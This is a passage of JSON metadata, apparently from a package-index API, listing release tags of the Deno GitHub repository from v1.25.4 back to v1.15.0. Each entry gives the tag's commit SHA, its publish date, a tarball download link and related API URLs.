anifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"http